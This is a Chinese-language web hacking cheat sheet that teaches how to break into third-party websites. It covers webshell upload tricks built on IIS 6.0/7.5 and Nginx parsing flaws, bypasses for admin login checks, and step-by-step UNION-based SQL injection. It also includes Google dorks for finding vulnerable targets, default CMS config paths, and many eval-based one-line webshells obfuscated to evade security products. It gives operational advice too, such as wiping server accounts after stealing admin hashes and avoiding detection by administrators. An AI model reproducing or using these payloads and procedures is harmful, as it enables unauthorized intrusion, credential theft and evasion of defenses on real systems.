【 拿shell 】
1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞":1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls
2.上传图片木马遇到拦截系统,连图片木马都上传不了,记事本打开图片木马在代码最前面加上gif89a,一般就能逃过拦截系统了。
3.上传图片木马把地址复制到数据库备份里备份成asp木马,有时不成功就利用IIs6.0解析漏洞尝试突破。
4.上传图片木马再用抓包工具进行抓包,用明小子的综合上传功能,复制上传地址及cookies填到对应的框里,点击上传即可。
5.当后台有数据库备份蛋没有上传点时,把一句话木马插到任意处,再到数据库备份里备份成asp木马,之后用一句话客户端连接木马即可。
6.后台点击修改密码,新密码设置为:1":eval request("h")’设置成功后连接asp/config.asp即可拿下shell
7.当页面提示“上传格式不正确[重新上传]” 则说明存在上传漏洞,复制地址放到明小子里上传,一般都能直接拿下shell。
8.当后台没有数据库备份但有数据库恢复的情况下,请不要犹豫,数据库恢复跟数据库备份功能是一样的,直接邪恶吧。
9.如果知道网站的数据库是asp的,直接在前台找留言板插入一句话木马,连接配置文件inc/config.asp即可拿下shell。
10.当网站前台有“会员注册” 注册一个账户进去看看有没有上传点,有的话直接上传asp木马以及利用iis6.0解析漏洞,不行就抓包用明小子上传。
11.先上传一个.ashx的文件,在笔记里搜索可找到方法,结果是访问会生成一句话木马文件,后台上传、编辑器上传、上传漏洞页面均可使用此方法。
12.当页面提示只能上传jpg|gif|png等格式的时候,右键查看源文件,本地修改为asp|asa|php再本地上传即可拿下shell。
13.当用啊D检测注入点提示SA权限或DB权限的时候,尝试列目录找到网站物理路径,再点击cmd/上传,直接上传asp木马即可,不行就差异备份拿shell。
14.对于一些上传漏洞的上传页面,以及后台找到的上传页面,可以尝试用本地双文件上传突破,第一个选jpg第二个选cer,推荐使用火狐浏览器。
【 渗透技巧 】
1.某些cms的网站设置过滤不严,直接在网站后面加上admin/session.asp 或 admin/left.asp 可以绕过后台验证直接进去后台。
2.提下服务器之后建议抓下管理员哈希值,然后删除所有用户包括自己的,以后登录这台服务器就用管理员的账号密码登录,这样比较安全。
3.入侵网站之前连接下3389,可以连接上的话先尝试弱口令,不行就按5次shift键,看看有没有shift后门。
4.访问后台地址时弹出提示框“请登陆” 把地址记出来(复制不了)放到“网页源代码分析器”里,选择浏览器-拦截跳转勾选--查看即可直接进入后台。
5.突破防盗链系统访问shell代码:javascript:document.write("<a href='http://www.xxx.com/uploadfile/1.asp'>fuck</a>") 点击GO即可进入shell。
6.遇到一流信息监控拦截系统时,上传图片木马或是在木马代码最前面加上gif89a即可逃过检测。
7.eweb编辑器后台,增加了asp|asa|cer|php|aspx等扩展名上传时都被过滤了,尝试增加一个aaspsp,再上传asp就会解析了。
8.用注入工具猜解到表段却猜解不到字段的时候,到网站后台右键查看源文件,一般账号密码后面的就是字段,之后在注入工具里添加字段进行猜解即可。
9.当注入工具猜解表段,但猜解字段时提示长度超过50之类,不妨扔到穿山甲去猜解一下。
10.得知表段跟字段之后,使用SQL语句在ACCESS数据库里加个用户名及密码的语句:Insert into admin(user,pwd) values('jianmei','daxia')
11.当获得管理员密码却不知道管理员帐号时,到网站前台找新闻链接,一般“提交者”“发布者”的名字就是管理员的帐号了。
12.爆破ASP+IIS架设的网站web绝对路径,假设网站主页为:http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。
13.有的站长很懒什么也不改,当我们得知网站的cms的时候,不妨去下载一套找找数据库路径,以及敏感信息,再尝试默认相关的可利用资源。
14.菜刀里点击一句话木马右键,选择虚拟机终端,执行命令出现乱码时,返回去设置编码那里,将默认的GB2312改为UTF-8.
15.入侵千万别忘了ftp,试试诺口令,ftp的默认端口:21 默认帐号密码:test
16.破解出md5为20位结果,只需要把前三位和后一位去掉,剩余16位拿去解密即可
17.好多网站的后台地址是:admin_index.asp manage_login.asp
18.有时在木马代码里加上了gif89a,上传成功访问的时候却出现了像图片一样的错误图像,说明服务器把gif89a当做图片来处理了,不要带gif89a即可。问就可以了。
19.找eweb编辑器的时候,如果默认的被改了,到前台去找图片右键看下路径,根据图片的目录猜eweb编辑器的目录,后台也是用此思路。
20.IIS注册表全版本泄漏用户路径和FTP用户名漏洞:HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual Roots
21.扫旁站的时候,是不是想看每个站点是什么cms呢?用轩辕剑扫描就可以显示系统特征。
22.网站的主站一般都很安全,这时就要旁注或C段了,但是想知道各个IP段开放了什么端口吗?用“啊D网络工具包”里面的IP端口扫描最理想了。
23.手工检测注入点弹出“你的操作已被记录!”之类的信息,访问这个文件:sqlin.asp,如果存在,在注入点后面植入一句话木马:‘excute(request("TNT"))
接着用一句话木马客户端连接:http://www.xxx.com/sqlin.asp,上传木马即可拿下shell,因为很多防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库。
24.有的后台不显示验证码,往注册表里添加一个ceg即可突破这个困境了,把下面的代码保存为Code.reg,双击导入就可以了。
REGEDIT4
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerSecurity]
"BlockXBM"=dword:00000000
25.内网渗透时尽量少登录3389,以免被管理员发现;
26.旁注的时候,建议挑php的站点来日,因为php站点一般都支持aspx脚本,这样对于提权跟跨目录都轻松.!
【 手工注入 】
IE浏览器-工具-Internet选项-高级-显示友好HTTP错误信息前面的勾去掉,否则不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的信息。
手工注入时如果网站过滤了 and 1=1 and 1=2 ,可以用xor 1=1 xor 1=2 进行判断。
第一步:找注入点
(数字型)http://www.xxx.com/show.asp?id=7
加' 程序报错
加and 1=1 返回正常页面
加and 1=2 返回错误页面
(字符型)http://www.xxx.com/show.asp?id=ade7
加' 程序报错
加'and '1'='1 返回正常页面
加'and '1'='2 返回错误页面
新型检测注入点的方法:
在URL地址后面加上-1,若返回的页面和前面不同,是另一个正常的页面,则表示存在注入漏洞,而且是数字型的注入漏洞。
在URL地址后面加上-0,若返回的页面和之前的页面相同,然后加上-1,返回错误页面,则也表示存在注入漏洞,而且是数字型的。
如果报错提示这个:
Microsoft JET Database Engine 错误 '80040e14'
语法错误 (操作符丢失) 在查询表达式 'ID = 6 ord by' 中。
/fun/Function.asp,行 657
解明:通过 JET 引擎连接数据库,则是 Access数据库,通过 ODBC 引擎连接数据库,则是 MSSQL数据库。
第二步:猜字段数
语句:order by 5
如果猜6的时候返回出错,就继续往回猜,直到返回正确为止...
第三步:UNION命令
语句:and 1=2 union select 1,2,3,4,5--
看看哪里可以替换,假如显示有2,就在2这里替换SCHEMA_NAME,见下
第三步:猜库名
语句:and 1=2 union select 1,SCHEMA_NAME,3,4,5 from information_schema.SCHEMATA limit 1,1
第四步:猜表段
语句:and 1=2 union select 1,TABLE_NAME,3,4,5 from information_schema.TABLES where TABLE_SCHEMA=0x68667A7338383838 limit 1,1
注意,TABLE_SCHEMA=后面的库名必须是hex转换过的格式,倒数第二个1一直替换,直到爆出所有表段,然后选最可能性的那个。
第五步:猜字段
and 1=2 union select 1,COLUMN_NAME,3,4,5 from information_schema.COLUMNS where TABLE_NAME=0x615F61646D696E limit 1,1
注意,TABLE_SCHEMA=后面的表段必须是hex转换过的格式,倒数第二个1一直替换,直到爆出所有字段,然后选最可能性的那两个。
第六步:猜内容
语句一:and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin
首先让程序报错,所以在注入点后面加上 and 1=2
语句二:http://www.xxx.com/show.asp?id=-178 union select 1,2,3,4,5,6,7,8,9,10,11,12 from admin
同样是先让程序报错,在178这个参数前面加上 -
当列名帐号跟列名密码都猜解对的时候,页面将会显示相对应的内容,一般的密码都经过MD5加密了,解密地址:http://www.chamd5.org/;(朋友的站打个广告) UserName Password
【 常见网站程序 】
asp类:
foosun(风讯)
kesion(科汛)
newasp(新云)
乔客
CreateLive(创力)
5uCMS
KingCMS
DvBBS(动网)
BBSxp
[博客]zblog
[博客]pjblog
PHP类:
DeDeCms(织梦)
ECMS(帝国)
PHPCMS
PHP168
HBcms(宏博)
SupeSite
CMSware(思维)
Joomla!
[BBS]Discuz!
[BBS]phpWind
[SNS]UCenterHome
[SNS]ThinkSNS
[商城]EcShop
[商城]ShopEx
[博客]WordPress
[维基]HDWiki
[微博]PHPsay
[DIGG]PBdigg
( php开源mysql绝对路径 )
开源系统 数据库配置文件名 文件名所在的目录
Discuz! config.inc.php ./ config.inc.php
Phpcms config.inc.php ./include/config.inc.php
Wodpress wp-config.php ./ wp-config.php
Phpwind sqlconfig.php ./data/sqlconfig.php
phpweb config.inc.php ./config.inc.php
Php168v6 mysql_config.php ./php168/ mysql_config.php
Shopex config.php ./config/config.php
Ecshop config.php ./data/config.php
Joomla configuration.php ./ configuration.php
UCenter config.inc.php ./data/config.inc.php
EmpireCMS config.php ./e/class/config.php
Dedecms common.inc.php .data/common.inc.php
Zen Cart configure.php ./includes/configure.php
Mediawiki localsettints.php ./config/localsettints.php
Ecshop config.php ./data/config.php
osCommerce configure.php ./includes/configure.php
【 谷歌黑客语法 】
site:可以限制你搜索范围的域名.
inurl:用于搜索网页上包含的URL,这个语法对寻找网页上的搜索,帮助之类的很有用.
intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标题、URL等的文字)
intitle: 查包含关键词的页面,一般用于社工别人的webshell密码
filetype:搜索文件的后缀或者扩展名
intitle:限制你搜索的网页标题.
link: 可以得到一个所有包含了某个指定URL的页面列表.
查找后台地址:site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms
查找文本内容:site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username
查找可注入点:site:域名 inurl:aspx|jsp|php|asp
查找上传漏洞:site:域名 inurl:file|load|editor|Files
找eweb编辑器:site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit
存在的数据库:site:域名 filetype:mdb|asp|#
查看脚本类型:site:域名 filetype:asp/aspx/php/jsp
迂回策略入侵:inurl:cms/data/templates/images/index/
利用谷歌黑客快速找到自己想要的资料:site:qiannao.com 提权视频
【 一句话木马 】
asp一句话木马:<%eval request("x")%>
php一句话木马:<?php eval($_POST[g]);?>
aspx一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["x"],"unsafe");%>
数据库加密一句话(密码a):┼攠數畣整爠煥敵瑳∨≡┩愾
网站配置、版权信息专用一句话:"%><%Eval Request(x)%>
一句话再过护卫神:<%Y=request("x")%> <%execute(Y)%>
过拦截一句话木马:<% eXEcGlOBaL ReQuEsT("x") %>
asp闭合型一句话 %><%eval request("0o1Znz1ow")%><%
能过安全狗的解析格式:;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg
突破安全狗的一句话:<%Y=request("x")%> <%eval(Y)%>
elong过安全狗的php一句话:<?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST[cc]); ?>
后台常用写入php一句话(密码x):
<?
$fp = @fopen("c.php", 'a');
@fwrite($fp, '<'.'?php'."
".'eval($_POST[x])'."
?".">
");
@fclose($fp);
?>
高强度php一句话:
<?php substr(md5($_REQUEST['heroes']),28)=='acd0'&&eval($_REQUEST['c']);?>
新型变异PHP一句话(密码b4dboy):
($b4dboy = $_POST['b4dboy']) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);
突破安全狗的aspx一句话:
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
突破护卫神,保护盾一句话:
<?php $a = str_replace(x,"","axsxxsxexrxxt");
$a($_POST["test"]); ?>
许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传,这样一句话木马就写入不进数据库了。
改成:〈scriptlanguage=VBScript runat=server〉execute request("l")〈/Script〉
这样就避开了使用〈%%〉,保存为.ASP,程序照样执行的效果是一样的。
PHP高强度一句话:
<?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['c']);?> 菜刀连接:/x.php?x=lostwolf 脚本类型:php 密码:c
<?php assert($_REQUEST["c"]);?> 菜刀连接 躲避检测 密码:c
【 解析漏洞总结 】
IIS 6.0
目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码
IIS6.0 会将 xx.jpg 解析为 asp 文件。
后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名)
IIS6.0 都会把此类后缀文件成功解析为 asp 文件。
默认解析:/xx.asa /xx.cer /xx.cdx
IIS6.0 默认的可执行文件除了 asp 还包含这三种
此处可联系利用目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg
IIS 7.0/IIS 7.5/Nginx <8.03
在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。
常用利用方法: 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾
e.g.
copy xx.jpg/b + yy.txt/a xy.jpg
/b 即二进制[binary]模式
/a 即ascii模式 xx.jpg正常图片文件
yy.txt 内容 <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称为shell.php的文件
找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php 即可执行恶意文本
.然后就在图片目录下生成一句话木马 shell.php 密码 cmd
【 fckeditor编辑器 】
查看版本:fckeditor/editor/dialog/fck_about.html
编辑器页面:FCKeditor/_samples/default.html
上传页面:fckeditor/editor/filemanager/connectors/test.html
遍历目录:FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
编辑页面:fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
查看文件上传路径:fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=
( 拿shell方法总结 )
ASPX的站几乎都用fck编辑器,建议用工具扫一下,记住inc目录下可能存在fck编辑器,扫下这个目录。
一:如果是iis6.0,上传两次 1.asp;.jpg 或者1.asp;1.jpg 或者创建x.asp目录,再在这个目录下上传x.jpg 或者直接上传1.asp;jpg 都可以完美解析拿下shell
二:第一次上传1.asp;1.jpg,被重命名为:1_asp;1.jpg,但是第二次上传1.asp;1.jpg,就有可能变成:1.asp;1(1).jpg
三:iis7.5+fck的解析文件为:a.aspx.a;.a.aspx.jpg..jpg.aspx
四:如果不是iis6.0 上传1.asp;jpg然后抓包,接下来改包,将分号变成空格,再用c32把20改成00,保存,利用%00 截断分号两次
五:成功访问别人的一句话木马页面,http://xxx.com/UploadFilesEditorFilefile/2.asp;2(1).jpg 但不知道密码
http://xxx.com/UploadFilesEditorFilefile2_asp;2.jpg 这个是图片木马,没有成功利用iis6.0解析漏洞还是图片,下载下来用记事本打开找到密码。
六:IIS7.0/7.5 通杀oday,把php一句话木马后缀改成1.jpg传上去,找出一句话的路径后,在1.jpg的后面添加/.php
( 建立文件夹 . 变 _ 的突破方法 )
利用Fiddler web debugger 这款工具来进行修改数据包,从而达到突破的目的。
注意:安装Fiddler web debugger,需要安装.net环境以及.net的SP2补丁方可运行!
1.打开fck的上传页面,例如:fckeditor/editor/filemanager/browser/default/connectors/test.html
2.再打开Fiddler web debugger这款工具,点击设置--自动断点--选择 “请求之前”
3.接着打开fck的上传页面,创建文件夹,并输入你想要创建的文件名,例如:x.asp
4.然后返回到Fiddler web debugger这款工具里,选择链接--点击右侧的嗅探
5.修改currentfolder内的参数,改成你要建立的文件夹名字,如:x.asp
6.然后点击右侧的:run to completion
7.再点击软件设置--自动断点--禁用,再到浏览器里点击确定建立文件夹,你就会发现文件夹建立为x.asp了
.jpg){kind=link}
